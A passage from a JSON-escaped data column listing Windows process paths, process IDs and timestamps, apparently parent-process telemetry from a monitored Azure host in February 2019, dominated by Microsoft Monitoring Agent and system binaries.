00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\unlodctr.exe|0x8f0|2019-02-10 00:45:28.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe|0x1158|2019-02-10 00:45:30.153000\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe|0x1158|2019-02-10 00:45:30.153000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\lodctr.exe|0x20b4|2019-02-10 00:45:30.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x22c0|2019-02-10 00:45:30.653000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1af0|2019-02-10 00:45:30.720000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1af0|2019-02-10 00:45:30.720000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x644|2019-02-10 00:45:36.180000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x1290|2019-02-10 00:45:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x2274|2019-02-10 00:45:38.023000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x91c|2019-02-10 00:46:28.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0xf10|2019-02-10 00:48:32.793000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\mof\\\\mofwriter.exe|0x1a00|2019-02-10 00:57:36.083000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe|0xe10|2019-02-10 00:57:36.167000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe|0xe10|2019-02-10 00:57:36.167000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe|0xe10|2019-02-10 00:57:36.167000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x12f8|2019-02-10 01:15:36.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3473\\\\webbinaries\\\\microsoft.sirona.oms.security.baselineassessment.exe|0xbd8|2019-02-10 01:30:36.103000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xf60|2019-02-10 01:45:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0x8c4|2019-02-10 01:48:32.220000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xb10|2019-02-10 02:15:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x17e0|2019-02-10 02:25:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x15b8|2019-02-10 02:45:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0xec0|2019-02-10 02:48:32.223000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0xdd0|2019-02-10 03:15:36.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x22dc|2019-02-10 03:15:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x838|2019-02-10 03:45:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0xe2c|2019-02-10 03:48:32.237000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x16e0|2019-02-10 04:05:36.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1c84|2019-02-10 04:15:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1b64|2019-02-10 04:45:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0x690|2019-02-10 04:48:32.243000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x1c20|2019-02-10 04:55:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1280|2019-02-10 05:15:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x650|2019-02-10 05:45:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1584|2019-02-10 05:45:36.283000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0x490|2019-02-10 05:48:32.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xfc0|2019-02-10 06:15:36.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0xa14|2019-02-10 06:35:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1ce4|2019-02-10 06:45:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0xcc8|2019-02-10 06:48:32.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x8f8|2019-02-10 07:15:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x1614|2019-02-10 07:25:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1850|2019-02-10 07:45:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0x1610|2019-02-10 07:48:32.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1080|2019-02-10 08:15:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x1248|2019-02-10 08:15:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1044|2019-02-10 08:45:36.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0xf08|2019-02-10 08:48:32.283000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0xa78|2019-02-10 09:05:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xd74|2019-02-10 09:15:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x23d8|2019-02-10 09:45:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0x3f8|2019-02-10 09:48:32.293000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x23b8|2019-02-10 09:55:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1548|2019-02-10 10:15:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x10a8|2019-02-10 10:45:36.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x5a8|2019-02-10 10:45:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0xf88|2019-02-10 10:48:32.310000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x18b8|2019-02-10 11:15:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x16e8|2019-02-10 11:35:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1d04|2019-02-10 11:45:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0xda8|2019-02-10 11:48:32.317000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1f20|2019-02-10 12:15:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0xe3c|2019-02-10 12:25:36.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1fa4|2019-02-10 12:45:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0x220c|2019-02-10 12:48:32.333000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x650|2019-02-10 13:15:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1570|2019-02-10 13:15:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xf60|2019-02-10 13:45:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0x154c|2019-02-10 13:48:32.323000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0xc60|2019-02-10 14:05:36.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x638|2019-02-10 14:15:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x15fc|2019-02-10 14:45:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0x1d38|2019-02-10 14:48:32.337000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x17b0|2019-02-10 14:55:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x17d0|2019-02-10 15:15:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x1fd0|2019-02-10 15:45:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x2120|2019-02-10 15:45:36.263000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x798|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x14ec|2019-02-09 20:05:31.010000\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1684|2019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1684|2019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1684|2019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1684|2019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1684|2019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1684|2019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1684|2019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1684|2019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xd74|2019-02-10 00:45:10.743000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x205c|2019-02-10 